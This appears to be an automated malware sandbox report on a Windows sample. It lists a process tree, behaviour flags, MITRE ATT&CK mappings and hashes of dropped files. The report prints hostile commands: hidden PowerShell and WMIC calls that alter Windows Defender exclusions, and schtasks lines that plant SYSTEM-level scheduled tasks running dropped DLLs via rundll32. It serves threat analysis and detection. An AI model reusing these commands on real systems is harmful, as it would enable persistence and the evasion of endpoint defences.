- Suspicious use of AdjustPrivilegeToken
PID:1656
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵PID:1492
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵PID:1768
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1988 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1548
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\namDtuGKU\pAGhZx.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "jRbEfcGJuWiRduS" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1040
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jRbEfcGJuWiRduS2" /F /xml "C:\Program Files (x86)\namDtuGKU\GxToifo.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2912
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "jRbEfcGJuWiRduS"3⤵PID:2020
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jRbEfcGJuWiRduS"3⤵PID:2792
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uzHildQRZSydMh" /F /xml "C:\Program Files (x86)\wEnnazEvJNiU2\pnaRKEd.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2724
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NvQssOSfNTtis2" /F /xml "C:\ProgramData\BRUhuLZnBvQZvqVB\DuIZlIN.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2772
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "HALKbVmngXfRdKBpU2" /F /xml "C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR\OaLnrZu.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2732
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KQGqlBuRrHzEMwByVTe2" /F /xml "C:\Program Files (x86)\bgwuTdWixDdNC\wKttDmN.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1832
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kPVQaxkVtdiJeIOQR" /SC once /ST 13:22:01 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\sFyaDrJXZzAeWCdu\MhIxGmEF\ZNlzJet.dll\",#1 /CWzvdidC 385137" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1556
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "kPVQaxkVtdiJeIOQR"3⤵PID:2088
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "KdMGsZYUagVlNoZLt"3⤵PID:532
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1292 -s 15443⤵
- Loads dropped DLL
- Program crash
PID:2500
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\sFyaDrJXZzAeWCdu\MhIxGmEF\ZNlzJet.dll",#1 /CWzvdidC 3851372⤵PID:2272
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\sFyaDrJXZzAeWCdu\MhIxGmEF\ZNlzJet.dll",#1 /CWzvdidC 3851373⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:876 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "kPVQaxkVtdiJeIOQR"4⤵PID:2092
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {819BFF70-0CB5-4203-87E6-5194CE8381D0} S-1-5-21-268080393-3149932598-1824759070-1000:UHRQKJCP\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:1972 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2956 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:980
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:840 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2200
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2664 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1804
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1652
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1508
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2628
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5adfa5a93efd3a4b3da46cc9f488a877a
SHA19b289b8bddae2769e2701626b967cf605132c5ff
SHA256395a7be8660e1c625457c42050fd2acb60712f2526791e2abfec44ff464b2149
SHA5121e1f1068c8be4655ba7af27941a866e2292fb18ea04890eacf491378a2f0d8a3053f6247dcd3b585f248b28d70316564ec3ef318db5e9d3046b3d47734bdc399
-
Filesize
2KB
MD516341165cd692c2460d35d9bdb23aa00
SHA1ec8647289235c572f8a2be08cf85f7a00f7f4f59
SHA256267e993cb6766b606fe65618a3749d449f8ae05572ba16ac0d849dc4ad210885
SHA512fd2d9c7d650996be2842682ced4add50afabbfc89e945ab513ef84aff3346047a2e00b7e7aae9fa6be44ca3761ee6f345dac50d031f301420b63d808adb6a73b
-
Filesize
2KB
MD530cef6fa984d154d1a2e4ccdd8c09583
SHA14f7e24d61394ac4836a5e187df3c9fc2d2c548e5
SHA25632aa9e6df20668f17149010722b49fa602eceb738db848ed9eeb4c02500318b5
SHA5129695d7fdc88a56a6fbdfbe1293feac31e26fd9e793aa404e7ce44340c49e783591810605b194f37552022d1a7db757d8b5e883351ac188a6ee76966164ea93d4
-
Filesize
2KB
MD551078f1253bcde51a4c194b3a39e4a41
SHA1a27483d21f6222ed74e1cd75b087306295958d0a
SHA25640b78212961eafa877500bfc67c556730016645305b8a88931530f5f5a36d501
SHA5128dd9d6a33a4336a3cf96e534aad638fe2777c70bdaf86e7b9db7425ef10ef1a5deb49e33337802db2aa4cb7b53aa8dd511f836f36d465d3c3b92eea921836d50
-
Filesize
2.5MB
MD52a2b4b0936d955c01df00f96d04f76a4
SHA19548f6ed9790286bf8b1a5874dcbca985cbac564
SHA256384c8ecf7165d0fa7423a9173cb521edb5bf26e7de8c76662ef0279b521f5888
SHA512eb117481cc11f067fcd010ba017e1d7617b05a0bf71ea8eb76e63e345d61b8d3330b7ac0fcc56d419a187a473b71ee95468d4d737c31665ade6c932cb97cad52
-
Filesize
2KB
MD58169a781d9b51885b7ac94ba04daaa20
SHA10d9cd4da0de2132a1da12b3807dcd467cd04f843
SHA25646e22f560724311be7a1a6be77e2d5a155dac33676f778a6ef9562364578baff
SHA512d85a192edb66b68b9058f5e8f1bf99bd9261d68c89f83a9a1c8120e26c54f750ad4a2e6b27058a923b667fa5cf266bfb43d94c44c0d8690e2fd12157b87a2bf1
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD5dd0333abfcd8135a5ed378d4950128f5
SHA1389313dc64667acba4e6d6f5866ef3dd50ca2e22
SHA256d5fb0519cb24fb8855b347916ec72c9a6fae6a7ad73f9d223e77bfed437fa0e9
SHA512abd5a41b43fa221708b3f053fedf78f7742cd8611a216a6e24b2dd6d6586fad61f238c98524207de6821019e7d6cee5ffa8962b4d2e13951ec6257531cd97e99
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD535ff1c53641dd5e67532257c67080bb7
SHA11d8a824484b1e46f8576395aef389314e2b89213
SHA25617fcf46da6cf6b9b3618a7570ec7f6d52dc2c7b115c2b7a4bb5924e306a549f4
SHA512418bb42ac9c69602180b7de4d8d74a1e53b472d5b5feefcec46e6347fcbf051ba40c866e40574f920d8a8470edac6c8058caa2b40cc183aba8f4356a2e283632
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9PPRW5M20AT6VR1DZUH7.temp
Filesize7KB
MD5012b49f83691b76ecbc7028c57d799fe
SHA1c02b53c4a8dd722c4435a548e7857657e226c5ab
SHA2563bdcb88efffbe9a1dd4578ef70722bdc814a2303e3db257316e51fa0aef9faec
SHA5121061d5aadc955aad49f924897f9908eaa9c66c96fd9f3ef2bc905a3510032cd49e7022e5e09891e435304cb446b410f099f7db1f0827ac46f0414b0c02e91fe7
-
Filesize
7KB
MD542932ec21e5f1ba7fdfaf14cd921297e
SHA1e903708571fc4d0cf9d79c8679ac4004a26f68a6
SHA256472071e51b1097c9f94b75f4feeb4b7bcdd652791a6d4c56257372e96b713f06
SHA51235d0ec6c9fdeaf38f0998cebb1b96258b7a7db1e92ae940898e0158269595b37e535b171fd8efb797f85db2d3cfcb0ab1ba4e13a15de7664adee04f3f7de1d98
-
Filesize
6.5MB
MD54dd6ffe036a2c5436f1e1e9d62c6f2bf
SHA148e9ca2c44a1e49133396c24d4901c2a4778309d
SHA256020dcc1479e413605e030d3596f00def68b27c1ad753f21c698dcede2e64b414
SHA512865c22e1a47fbc9c919c7f1a18df8f33c4c9e5f257f1f5ac86df15bbc11051d8cdd69659ba22db964d389be482fba65a82fa5f85b917a43a65781eb06e4744a5
-
Filesize
9KB
MD5b1298bc2ab481b172dcfb5c18352cccd
SHA1101c33e191d3f6141bff45e90a9d0601918d68c8
SHA25650d3bf511ee4d650c52c01fb34adf41714738e45178611848705f08ee3e7e8a9
SHA5127d548e1748a9ae35d39d43abe229f0b9ac8b79f3d692c492efa34b2f9683bd36dfbd9eb5079552fd3df5d252cdba132dfe41bb0bbaa4655e4af71457c4950344
-
Filesize
5KB
MD514040cad2a300ee14d5651c4adde86de
SHA15f38809151ad53b85a40e371c7da024172f6ce14
SHA256dafb30dacf2f552d277643f882e0555eda8c7b9babf47b2c59806d81d223bfb2
SHA512699fa229ca7864739e90d6efce574f30ef71a102a7e3c4da2c443f543f9f40ef01bd5c81082f693f8afe6bf66b74e9ca38efa4f16105b23b84c8abe63a22449f
-
Filesize
6.4MB
MD5e1eb160e2a12fdf0f65a07a498aba431
SHA102eb5daa26306f5b5e72f2ec293aa9113f403afd
SHA25625e3ea3488bd6ccaa80f7dae5ff9e80c321aa2a5be6c63131c1398bb9f3a3eb3
SHA512b3ed48fefab16826acae14ed9a28276853efa8267f3cb2202f5dcddf2a3d32d738f41009c529aee699c51603a0af0f18ee22a6dd43e65c2f325d3d995a43dde6
-
Filesize
6.7MB
MD571bf676ae80afa9f2577d2eae6a133ae
SHA10fedcfbd17c9a11a97ce5c6b984926b5a510f533
SHA2569f803c1fd9944d0050032ecd983de008c13c0e939e66d13c1d138551d290be99
SHA512f8150af3a932ead9e6968569978ddba194b6355d4ac65bfcd7e54302e2f7f4b944c27baf3763297f5edc2d8eddb89bafea2489a79e1a77c695cc65fd967cf545